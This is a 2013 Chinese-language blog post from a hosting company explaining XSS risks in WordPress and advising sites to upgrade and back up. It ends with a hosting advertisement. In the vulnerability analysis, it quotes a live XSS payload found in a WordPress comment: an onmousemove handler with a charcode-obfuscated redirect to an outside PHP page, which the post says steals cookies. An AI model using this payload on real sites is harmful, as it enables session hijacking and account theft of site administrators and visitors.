新闻中心

wordpress站出现XSS 跨站脚本漏洞如何解决

作者 / 无忧主机 时间 2013-07-26 21:03:18

站长朋友们在建站的时候,想必都会遇到过这类JS脚本漏洞的问题,无忧主机小编在此先介绍一下XSS是什么,跨站脚本攻击漏洞,ss表示(Site Script);由于这种漏洞的危害性很大,容易让黑客们钻空子,导致网站陷入面临倒闭的境地,于是小编索罗了有关XSS跨站脚本漏洞容易导致的一些的危害以供参考: 1.钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入,甚至发起基于DHTML更高级的钓鱼攻击方式。 2. 网站挂马:跨站后利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。 3.身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。如果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。 4.盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份时,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。 5.垃圾信息发送:比如在SNS社区中,利用XSS漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群体。 6.劫持用户Web行为:一些高级的XSS攻击甚至可以劫持用户的Web行为,监视用户的浏览历史,发送与接收的数据等等。 7.XSS蠕虫:XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施DDoS攻击等。   漏动剖析: 在wordpress程序的评论列表中出现以下代码:这段代码的作用是获取您本地的cookie值,也就相当于您的网站后台代码被发这条链接的人获取了; http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112); wordpress站出现XSS 跨站脚本漏洞如何解决 wordpress8

漏洞修补方式: 升级WP程序,及时修复网站的补丁; 看了这么多的参考信息,您一定不想出现类似问题,怎么样处理这个JS跨脚本漏洞呢?就拿wordpress个人博客开源程序来,其解决办法就是把网站程序升级到官方最新版本;在这里无忧主机(www.51php.com)小编要提醒各位即将打算升级程序的站长朋友们,升级之前请先备份网站程序,以防升级出错,如何做好网站程序的备份呢?请参考无忧主机文库中的“无忧主机推荐网站数据整站备份方法”;备份好了,再升级。 纯Linux环境下高端免备案【香港独立IP地址】 php空间,仅仅只需199元一年起。全网最低价域名感恩广大新老客户,首年只要39元。

本文地址:https://www.51php.com/wordpress/11760.html

1
1
1
1
1
1
1